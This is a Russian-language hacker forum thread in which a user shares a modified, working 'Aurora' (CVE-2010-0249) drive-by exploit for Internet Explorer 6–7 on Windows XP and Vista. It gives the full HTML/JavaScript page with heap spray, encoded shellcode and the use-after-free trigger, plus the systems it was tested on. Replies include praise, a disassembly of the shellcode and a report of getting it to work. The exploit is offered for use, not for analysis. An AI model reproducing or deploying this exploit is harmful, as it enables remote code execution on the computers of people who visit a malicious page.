aurora / ms10-002

[Exmanoize]

/ ms10-002 / CVE-2010-0249 / "Aurora" exploit /
moded by: ExmaGroup.
worked on: MSIE 6-7 , OS: XP,Vista, (seven?)
насколько я знаю, у всех что были выложены в паблик,шеллкод работал только на ИЕ6 ХП.

Спойлер: 50

данный же вариант работает на МСИЕ 6-7(8 не работает,деп), ХП,Виста (может севен,не знаем специфику его...)
проверен был на:
* XPSp2+IE6
* XPSp2+IE7,
* XPSp3+IE7,
* VistaSp1+IE7, шеллкод везде сработал.

шеллкод = запуск калька.

<html>
<head>
<script>

	var sss = new Array();
	for (i = 0; i < 200; i ++ ){
    sss[i] = document.createElement("COMMENT");
    sss[i].data = "ilf";
	};

	var varNul = null;

	var x1 = new Array();

	function EvilFunc() {

  var sc = unescape( "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370");

  var Scrap = unescape( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );

  do { Scrap += Scrap; } while( Scrap.length < 0xf0000 );

  for(i = 0; i < 620; i++) x1[i] = Scrap + sc;
	}

	function VulnFunc(evt){
  EvilFunc();
     varNul = document.createEventObject(evt);
     document.getElementById("spl").innerHTML = "";
     window.setInterval(ev2, 50);
	}

	function ev2(){
   p = "\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c";
   for (i = 0; i < sss.length; i ++ ){
       sss[i].data = p;
   }

   var t = varNul.srcElement;
	}
</script>
</head>
<body>

<span id="spl"><img src="aurora.gif" onload="VulnFunc(event)"></span></body></html>

</body>
</html>

интересно ваше мнение,тесты,наработки)

 

[darkstorm3535]

Великая работа.

 

[G100M]

Ex, а зачем ты это выкладываешь?

 

[TrueUser]

Ex, а зачем ты это выкладываешь?

Он нас любит поблагодарим его

 

[Chococream]

Спойлер: 52

VmWare, WinXP SP2, IE6 - не сработал.
Вытащил шк - хз, может там что не так.
00000000 /EB 03 JMP SHORT 00000005
00000002 59 POP ECX
00000003 EB 05 JMP SHORT 0000000A
00000005 E8 F8FFFFFF CALL 00000002
0000000A 49 DEC ECX
0000000B 49 DEC ECX
0000000C 49 DEC ECX
0000000D 49 DEC ECX
0000000E 49 DEC ECX
0000000F 49 DEC ECX
00000010 48 DEC EAX
00000011 49 DEC ECX
00000012 49 DEC ECX
00000013 49 DEC ECX
00000014 49 DEC ECX
00000015 49 DEC ECX
00000016 49 DEC ECX
00000017 49 DEC ECX
00000018 49 DEC ECX
00000019 49 DEC ECX
0000001A 49 DEC ECX
0000001B 49 DEC ECX
0000001C 51 PUSH ECX
0000001D 5A POP EDX
0000001E 6A 43 PUSH 43
00000020 58 POP EAX
00000021 3042 31 XOR BYTE PTR DS:[EDX+31],AL
00000024 50 PUSH EAX
00000025 42 INC EDX
00000026 41 INC ECX
00000027 6B42 41 53 IMUL EAX,DWORD PTR DS:[EDX+41],53
0000002B 42 INC EDX
0000002C 3242 41 XOR AL,BYTE PTR DS:[EDX+41]
0000002F 3241 41 XOR AL,BYTE PTR DS:[ECX+41]
00000032 3041 41 XOR BYTE PTR DS:[ECX+41],AL
00000035 58 POP EAX
00000036 50 PUSH EAX
00000037 3842 42 CMP BYTE PTR DS:[EDX+42],AL
0000003A 75 48 JNZ SHORT 00000084
0000003C 696B 4C 4D38637>IMUL EBP,DWORD PTR DS:[EBX+4C],7463384D
00000043 75 50 JNZ SHORT 00000095
00000045 3330 XOR ESI,DWORD PTR DS:[EAX]
00000047 67:70 4C JO SHORT 00000096
0000004A 4B DEC EBX
0000004B 73 75 JNB SHORT 000000C2
0000004D 57 PUSH EDI
0000004E 4C DEC ESP
0000004F 6E OUTS DX,BYTE PTR ES:[EDI]
00000050 6B63 4C 45 IMUL ESP,DWORD PTR DS:[EBX+4C],45
00000054 55 PUSH EBP
00000055 6348 33 ARPL WORD PTR DS:[EAX+33],CX
00000058 3158 6F XOR DWORD PTR DS:[EAX+6F],EBX
0000005B 6C INS BYTE PTR ES:[EDI],DX
0000005C 4B DEC EBX
0000005D 70 4F JO SHORT 000000AE
0000005F 77 68 JA SHORT 000000C9
00000061 6E OUTS DX,BYTE PTR ES:[EDI]
00000062 6B73 6F 71 IMUL ESI,DWORD PTR DS:[EBX+6F],71
00000066 3065 51 XOR BYTE PTR SS:[EBP+51],AH
00000069 6A 4B PUSH 4B
0000006B 72 69 JB SHORT 000000D6
0000006D 4E DEC ESI
0000006E 6B36 54 IMUL ESI,DWORD PTR DS:[ESI],54
00000071 4E DEC ESI
00000072 6B45 51 4A IMUL EAX,DWORD PTR SS:[EBP+51],4A
00000076 4E DEC ESI
00000077 46 INC ESI
00000078 51 PUSH ECX
00000079 6B70 4F 69 IMUL ESI,DWORD PTR DS:[EAX+4F],69
0000007D 4C DEC ESP
0000007E 6C INS BYTE PTR ES:[EDI],DX
0000007F 6E OUTS DX,BYTE PTR ES:[EDI]
00000080 64:59 POP ECX
00000082 50 PUSH EAX
00000083 73 44 JNB SHORT 000000C9
00000085 53 PUSH EBX
00000086 37 AAA
00000087 58 POP EAX
00000088 41 INC ECX
00000089 7A 6A JPE SHORT 000000F5
0000008B 54 PUSH ESP
0000008C 4D DEC EBP
0000008D 3331 XOR ESI,DWORD PTR DS:[ECX]
0000008F 78 42 JS SHORT 000000D3
00000091 48 DEC EAX
00000092 6B7A 54 77 IMUL EDI,DWORD PTR DS:[EDX+54],77
00000096 4B DEC EBX
00000097 52 PUSH EDX
00000098 74 66 JE SHORT 00000100
0000009A 44 INC ESP
0000009B 34 44 XOR AL,44
0000009D 6255 59 BOUND EDX,QWORD PTR SS:[EBP+59]
000000A0 75 6E JNZ SHORT 00000110
000000A2 6B41 4F 36 IMUL EAX,DWORD PTR DS:[ECX+4F],36
000000A6 44 INC ESP
000000A7 45 INC EBP
000000A8 51 PUSH ECX
000000A9 6A 4B PUSH 4B
000000AB 53 PUSH EBX
000000AC 56 PUSH ESI
000000AD 4C DEC ESP
000000AE 4B DEC EBX
000000AF 46 INC ESI
000000B0 6C INS BYTE PTR ES:[EDI],DX
000000B1 72 6B JB SHORT 0000011E
000000B3 4C DEC ESP
000000B4 4B DEC EBX
000000B5 53 PUSH EBX
000000B6 6F OUTS DX,DWORD PTR ES:[EDI]
000000B7 37 AAA
000000B8 6C INS BYTE PTR ES:[EDI],DX
000000B9 6331 ARPL WORD PTR DS:[ECX],SI
000000BB 6A 4B PUSH 4B
000000BD 4E DEC ESI
000000BE 6B75 4C 6C IMUL ESI,DWORD PTR SS:[EBP+4C],6C
000000C2 4B DEC EBX
000000C3 54 PUSH ESP
000000C4 41 INC ECX
000000C5 48 DEC EAX
000000C6 6B4D 59 51 IMUL ECX,DWORD PTR SS:[EBP+59],51
000000CA 4C DEC ESP
000000CB 51 PUSH ECX
000000CC 34 34 XOR AL,34
000000CE 44 INC ESP
000000CF 4A DEC EDX
000000D0 6330 ARPL WORD PTR DS:[EAX],SI
000000D2 316F 30 XOR DWORD PTR DS:[EDI+30],EBP
000000D5 62444E 6B BOUND EAX,QWORD PTR DS:[ESI+ECX*2+6B]
000000D9 71 50 JNO SHORT 0000012B
000000DB 54 PUSH ESP
000000DC 70 4B JO SHORT 00000129
000000DE 35 6B705078 XOR EAX,7850706B
000000E3 46 INC ESI
000000E4 6C INS BYTE PTR ES:[EDI],DX
000000E5 6C INS BYTE PTR ES:[EDI],DX
000000E6 4B DEC EBX
000000E7 6370 44 ARPL WORD PTR DS:[EAX+44],SI
000000EA 4C DEC ESP
000000EB 4C DEC ESP
000000EC 4B DEC EBX
000000ED 44 INC ESP
000000EE 3035 4C6E4D6C XOR BYTE PTR DS:[6C4D6E4C],DH
000000F4 4B DEC EBX
000000F5 61 POPAD
000000F6 78 55 JS SHORT 0000014D
000000F8 58 POP EAX
000000F9 6A 4B PUSH 4B
000000FB 64:49 DEC ECX
000000FD 4E DEC ESI
000000FE 6B6B 30 6C IMUL EBP,DWORD PTR DS:[EBX+30],6C
00000102 70 57 JO SHORT 0000015B
00000104 70 57 JO SHORT 0000015D
00000106 70 47 JO SHORT 0000014F
00000108 70 4C JO SHORT 00000156
0000010A 4B DEC EBX
0000010B 70 68 JO SHORT 00000175
0000010D 47 INC EDI
0000010E 4C DEC ESP
0000010F 71 4F JNO SHORT 00000160
00000111 44 INC ESP
00000112 - 71 6B JNO SHORT 0000017F
00000114 46 INC ESI
00000115 3350 66 XOR EDX,DWORD PTR DS:[EAX+66]
00000118 36:4F DEC EDI
0000011A 79 4C JNS SHORT 00000168
0000011C 386E 63 CMP BYTE PTR DS:[ESI+63],CH
0000011F 4F DEC EDI
00000120 3071 6B XOR BYTE PTR DS:[ECX+6B],DH
00000123 3050 41 XOR BYTE PTR DS:[EAX+41],DL
00000126 - 78 58 JS SHORT 00000180
00000128 - 70 6C JO SHORT 00000196
0000012A 4A DEC EDX
0000012B 53 PUSH EBX
0000012C 34 51 XOR AL,51
0000012E 4F DEC EDI
0000012F 3358 4E XOR EBX,DWORD PTR DS:[EAX+4E]
00000132 78 39 JS SHORT 0000016D
00000134 6E OUTS DX,BYTE PTR ES:[EDI]
00000135 6D INS DWORD PTR ES:[EDI],DX
00000136 5A POP EDX
00000137 46 INC ESI
00000138 6E OUTS DX,BYTE PTR ES:[EDI]
00000139 61 POPAD
0000013A 47 INC EDI
0000013B 4B DEC EBX
0000013C 4F DEC EDI
0000013D 6977 63 53456A3>IMUL ESI,DWORD PTR DS:[EDI+63],336A4553
00000144 6C INS BYTE PTR ES:[EDI],DX
00000145 - 72 57 JB SHORT 0000019E
00000147 3069 50 XOR BYTE PTR DS:[ECX+50],CH
0000014A 6E OUTS DX,BYTE PTR ES:[EDI]
0000014B 624470 6F BOUND EAX,QWORD PTR DS:[EAX+ESI*2+6F]
0000014F - 73 47 JNB SHORT 00000198
00000151 41 INC ECX
00000152 6341 4C ARPL WORD PTR DS:[ECX+4C],AX
00000155 50 PUSH EAX
00000156 - 73 42 JNB SHORT 0000019A
00000158 59 POP ECX
00000159 3163 50 XOR DWORD PTR DS:[EBX+50],ESP
0000015C - 74 65 JE SHORT 000001C3
0000015E 35 706D5473 XOR EAX,73546D70
00000163 65:6233 BOUND ESI,QWORD PTR GS:[EBX]
00000166 6C INS BYTE PTR ES:[EDI],DX
00000167 3063 41 XOR BYTE PTR DS:[EBX+41],AH
0000016A - 71 70 JNO SHORT 000001DC
0000016C 6C INS BYTE PTR ES:[EDI],DX
0000016D 53 PUSH EBX
0000016E 53 PUSH EBX
0000016F 66:4E DEC SI
00000171 3175 74 XOR DWORD PTR SS:[EBP+74],ESI
00000174 3870 65 CMP BYTE PTR DS:[EAX+65],DH
00000177 - 77 70 JA SHORT 000001E9
00000179 43 INC EBX

 

[Chococream]

Спойлер: 50

Поправка: в хтмл коде изменил что-то, в следствие чего не запускалось, всё исправил - заработало, пусть пока шк висит здесь... мб кому пригодится)

 

[chapinhack]

эй пожалуйста отправьте это в rapidshare